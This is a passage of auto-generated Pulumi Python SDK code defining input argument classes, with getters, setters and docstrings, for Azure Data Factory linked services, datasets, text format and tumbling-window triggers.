@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class SquareObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Square Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'SquareObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SybaseLinkedServiceArgs:
def __init__(__self__, *,
database: Any,
server: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
schema: Optional[Any] = None,
username: Optional[Any] = None):
"""
Linked service for Sybase data source.
:param Any database: Database name for connection. Type: string (or Expression with resultType string).
:param Any server: Server name for connection. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[str] authentication_type: AuthenticationType to be used for connection.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for authentication.
:param Any schema: Schema name for connection. Type: string (or Expression with resultType string).
:param Any username: Username for authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "database", database)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'Sybase')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if schema is not None:
pulumi.set(__self__, "schema", schema)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def database(self) -> Any:
"""
Database name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "database")
@database.setter
def database(self, value: Any):
pulumi.set(self, "database", value)
@property
@pulumi.getter
def server(self) -> Any:
"""
Server name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
AuthenticationType to be used for connection.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def schema(self) -> Optional[Any]:
"""
Schema name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "schema")
@schema.setter
def schema(self, value: Optional[Any]):
pulumi.set(self, "schema", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
Username for authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class TeradataLinkedServiceArgs:
def __init__(__self__, *,
server: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
username: Optional[Any] = None):
"""
Linked service for Teradata data source.
:param Any server: Server name for connection. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[str] authentication_type: AuthenticationType to be used for connection.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for authentication.
:param Any username: Username for authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "type", 'Teradata')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter
def server(self) -> Any:
"""
Server name for connection. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: Any):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
AuthenticationType to be used for connection.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
Username for authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class TextFormatArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
column_delimiter: Optional[Any] = None,
deserializer: Optional[Any] = None,
encoding_name: Optional[Any] = None,
escape_char: Optional[Any] = None,
first_row_as_header: Optional[Any] = None,
null_value: Optional[Any] = None,
quote_char: Optional[Any] = None,
row_delimiter: Optional[Any] = None,
serializer: Optional[Any] = None,
skip_line_count: Optional[Any] = None,
treat_empty_as_null: Optional[Any] = None):
"""
The data stored in text format.
:param pulumi.Input[str] type: Type of dataset storage format.
:param Any column_delimiter: The column delimiter. Type: string (or Expression with resultType string).
:param Any deserializer: Deserializer. Type: string (or Expression with resultType string).
:param Any encoding_name: The code page name of the preferred encoding. If missing, the default value is "utf-8", unless the BOM denotes another Unicode encoding. Refer to the "Name" column of the table at the following link for supported values: https://msdn.microsoft.com/library/system.text.encoding.aspx. Type: string (or Expression with resultType string).
:param Any escape_char: The escape character. Type: string (or Expression with resultType string).
:param Any first_row_as_header: When used as input, treat the first row of data as headers. When used as output, write the headers into the output as the first row of data. The default value is false. Type: boolean (or Expression with resultType boolean).
:param Any null_value: The null value string. Type: string (or Expression with resultType string).
:param Any quote_char: The quote character. Type: string (or Expression with resultType string).
:param Any row_delimiter: The row delimiter. Type: string (or Expression with resultType string).
:param Any serializer: Serializer. Type: string (or Expression with resultType string).
:param Any skip_line_count: The number of lines/rows to be skipped when parsing text files. The default value is 0. Type: integer (or Expression with resultType integer).
:param Any treat_empty_as_null: Treat empty column values in the text file as null. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
pulumi.set(__self__, "type", 'TextFormat')
if column_delimiter is not None:
pulumi.set(__self__, "column_delimiter", column_delimiter)
if deserializer is not None:
pulumi.set(__self__, "deserializer", deserializer)
if encoding_name is not None:
pulumi.set(__self__, "encoding_name", encoding_name)
if escape_char is not None:
pulumi.set(__self__, "escape_char", escape_char)
if first_row_as_header is not None:
pulumi.set(__self__, "first_row_as_header", first_row_as_header)
if null_value is not None:
pulumi.set(__self__, "null_value", null_value)
if quote_char is not None:
pulumi.set(__self__, "quote_char", quote_char)
if row_delimiter is not None:
pulumi.set(__self__, "row_delimiter", row_delimiter)
if serializer is not None:
pulumi.set(__self__, "serializer", serializer)
if skip_line_count is not None:
pulumi.set(__self__, "skip_line_count", skip_line_count)
if treat_empty_as_null is not None:
pulumi.set(__self__, "treat_empty_as_null", treat_empty_as_null)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset storage format.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="columnDelimiter")
def column_delimiter(self) -> Optional[Any]:
"""
The column delimiter. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "column_delimiter")
@column_delimiter.setter
def column_delimiter(self, value: Optional[Any]):
pulumi.set(self, "column_delimiter", value)
@property
@pulumi.getter
def deserializer(self) -> Optional[Any]:
"""
Deserializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "deserializer")
@deserializer.setter
def deserializer(self, value: Optional[Any]):
pulumi.set(self, "deserializer", value)
@property
@pulumi.getter(name="encodingName")
def encoding_name(self) -> Optional[Any]:
"""
The code page name of the preferred encoding. If missing, the default value is "utf-8", unless the BOM denotes another Unicode encoding. Refer to the "Name" column of the table at the following link for supported values: https://msdn.microsoft.com/library/system.text.encoding.aspx. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encoding_name")
@encoding_name.setter
def encoding_name(self, value: Optional[Any]):
pulumi.set(self, "encoding_name", value)
@property
@pulumi.getter(name="escapeChar")
def escape_char(self) -> Optional[Any]:
"""
The escape character. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "escape_char")
@escape_char.setter
def escape_char(self, value: Optional[Any]):
pulumi.set(self, "escape_char", value)
@property
@pulumi.getter(name="firstRowAsHeader")
def first_row_as_header(self) -> Optional[Any]:
"""
When used as input, treat the first row of data as headers. When used as output, write the headers into the output as the first row of data. The default value is false. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "first_row_as_header")
@first_row_as_header.setter
def first_row_as_header(self, value: Optional[Any]):
pulumi.set(self, "first_row_as_header", value)
@property
@pulumi.getter(name="nullValue")
def null_value(self) -> Optional[Any]:
"""
The null value string. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "null_value")
@null_value.setter
def null_value(self, value: Optional[Any]):
pulumi.set(self, "null_value", value)
@property
@pulumi.getter(name="quoteChar")
def quote_char(self) -> Optional[Any]:
"""
The quote character. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "quote_char")
@quote_char.setter
def quote_char(self, value: Optional[Any]):
pulumi.set(self, "quote_char", value)
@property
@pulumi.getter(name="rowDelimiter")
def row_delimiter(self) -> Optional[Any]:
"""
The row delimiter. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "row_delimiter")
@row_delimiter.setter
def row_delimiter(self, value: Optional[Any]):
pulumi.set(self, "row_delimiter", value)
@property
@pulumi.getter
def serializer(self) -> Optional[Any]:
"""
Serializer. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "serializer")
@serializer.setter
def serializer(self, value: Optional[Any]):
pulumi.set(self, "serializer", value)
@property
@pulumi.getter(name="skipLineCount")
def skip_line_count(self) -> Optional[Any]:
"""
The number of lines/rows to be skipped when parsing text files. The default value is 0. Type: integer (or Expression with resultType integer).
"""
return pulumi.get(self, "skip_line_count")
@skip_line_count.setter
def skip_line_count(self, value: Optional[Any]):
pulumi.set(self, "skip_line_count", value)
@property
@pulumi.getter(name="treatEmptyAsNull")
def treat_empty_as_null(self) -> Optional[Any]:
"""
Treat empty column values in the text file as null. The default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "treat_empty_as_null")
@treat_empty_as_null.setter
def treat_empty_as_null(self, value: Optional[Any]):
pulumi.set(self, "treat_empty_as_null", value)
@pulumi.input_type
class TriggerPipelineReferenceArgs:
def __init__(__self__, *,
parameters: Optional[pulumi.Input[Mapping[str, Any]]] = None,
pipeline_reference: Optional[pulumi.Input['PipelineReferenceArgs']] = None):
"""
Pipeline that needs to be triggered with the given parameters.
:param pulumi.Input[Mapping[str, Any]] parameters: Pipeline parameters.
:param pulumi.Input['PipelineReferenceArgs'] pipeline_reference: Pipeline reference.
"""
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if pipeline_reference is not None:
pulumi.set(__self__, "pipeline_reference", pipeline_reference)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Pipeline parameters.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="pipelineReference")
def pipeline_reference(self) -> Optional[pulumi.Input['PipelineReferenceArgs']]:
"""
Pipeline reference.
"""
return pulumi.get(self, "pipeline_reference")
@pipeline_reference.setter
def pipeline_reference(self, value: Optional[pulumi.Input['PipelineReferenceArgs']]):
pulumi.set(self, "pipeline_reference", value)
@pulumi.input_type
class TumblingWindowTriggerArgs:
def __init__(__self__, *,
frequency: pulumi.Input[str],
interval: pulumi.Input[int],
max_concurrency: pulumi.Input[int],
pipeline: pulumi.Input['TriggerPipelineReferenceArgs'],
start_time: pulumi.Input[str],
type: pulumi.Input[str],
delay: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
retry_policy: Optional[pulumi.Input['RetryPolicyArgs']] = None):
"""
Trigger that schedules pipeline runs for all fixed time interval windows from a start time without gaps and also supports backfill scenarios (when start time is in the past).
:param pulumi.Input[str] frequency: The frequency of the time windows.
:param pulumi.Input[int] interval: The interval of the time windows. The minimum interval allowed is 15 Minutes.
:param pulumi.Input[int] max_concurrency: The max number of parallel time windows (ready for execution) for which a new run is triggered.
:param pulumi.Input['TriggerPipelineReferenceArgs'] pipeline: Pipeline for which runs are created when an event is fired for a trigger window that is ready.
:param pulumi.Input[str] start_time: The start time for the time period for the trigger during which events are fired for windows that are ready. Only UTC time is currently supported.
:param pulumi.Input[str] type: Trigger type.
:param Any delay: Specifies how long the trigger waits past the due time before triggering a new run. It does not alter the window start and end times. The default is 0. Type: string (or Expression with resultType string), pattern: ((\d+)\.)?(\d\d):(60|([0-5][0-9])):(60|([0-5][0-9])).
:param pulumi.Input[str] description: Trigger description.
:param pulumi.Input[str] end_time: The end time for the time period for the trigger during which events are fired for windows that are ready. Only UTC time is currently supported.
:param pulumi.Input['RetryPolicyArgs'] retry_policy: Retry policy that will be applied for failed pipeline runs.
"""
pulumi.set(__self__, "frequency", frequency)
pulumi.set(__self__, "interval", interval)
pulumi.set(__self__, "max_concurrency", max_concurrency)
pulumi.set(__self__, "pipeline", pipeline)
pulumi.set(__self__, "start_time", start_time)
pulumi.set(__self__, "type", 'TumblingWindowTrigger')
if delay is not None:
pulumi.set(__self__, "delay", delay)
if description is not None:
pulumi.set(__self__, "description", description)
if end_time is not None:
pulumi.set(__self__, "end_time", end_time)
if retry_policy is not None:
pulumi.set(__self__, "retry_policy", retry_policy)
@property
@pulumi.getter
def frequency(self) -> pulumi.Input[str]:
"""
The frequency of the time windows.
"""
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: pulumi.Input[str]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter
def interval(self) -> pulumi.Input[int]:
"""
The interval of the time windows. The minimum interval allowed is 15 Minutes.
"""
return pulumi.get(self, "interval")
@interval.setter
def interval(self, value: pulumi.Input[int]):
pulumi.set(self, "interval", value)
@property
@pulumi.getter(name="maxConcurrency")
def max_concurrency(self) -> pulumi.Input[int]:
"""
The max number of parallel time windows (ready for execution) for which a new run is triggered.
"""
return pulumi.get(self, "max_concurrency")
@max_concurrency.setter
def max_concurrency(self, value: pulumi.Input[int]):
pulumi.set(self, "max_concurrency", value)
@property
@pulumi.getter
def pipeline(self) -> pulumi.Input['TriggerPipelineReferenceArgs']:
"""
Pipeline for which runs are created when an event is fired for a trigger window that is ready.
"""
return pulumi.get(self, "pipeline")
@pipeline.setter
def pipeline(self, value: pulumi.Input['TriggerPipelineReferenceArgs']):
pulumi.set(self, "pipeline", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> pulumi.Input[str]:
"""
The start time for the time period for the trigger during which events are fired for windows that are ready. Only UTC time is currently supported.
"""
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: pulumi.Input[str]):
pulumi.set(self, "start_time", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Trigger type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def delay(self) -> Optional[Any]:
"""
Specifies how long the trigger waits past the due time before triggering a new run. It does not alter the window start and end times. The default is 0. Type: string (or Expression with resultType string), pattern: ((\d+)\.)?(\d\d):(60|([0-5][0-9])):(60|([0-5][0-9])).
"""
return pulumi.get(self, "delay")
@delay.setter
def delay(self, value: Optional[Any]):
pulumi.set(self, "delay", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Trigger description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="endTime")
def end_time(self) -> Optional[pulumi.Input[str]]:
"""
The end time for the time period for the trigger during which events are fired for windows that are ready. Only UTC time is currently supported.
"""
return pulumi.get(self, "end_time")
@end_time.setter
def end_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "end_time", value)
@property
@pulumi.getter(name="retryPolicy")
def retry_policy(self) -> Optional[pulumi.Input['RetryPolicyArgs']]:
"""
Retry policy that will be applied for failed pipeline runs.
"""
return pulumi.get(self, "retry_policy")
@retry_policy.setter
def retry_policy(self, value: Optional[pulumi.Input['RetryPolicyArgs']]):
pulumi.set(self, "retry_policy", value)
@pulumi.input_type
class VerticaLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
connection_string: Optional[Any] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Vertica linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param Any connection_string: An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Vertica')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class VerticaTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
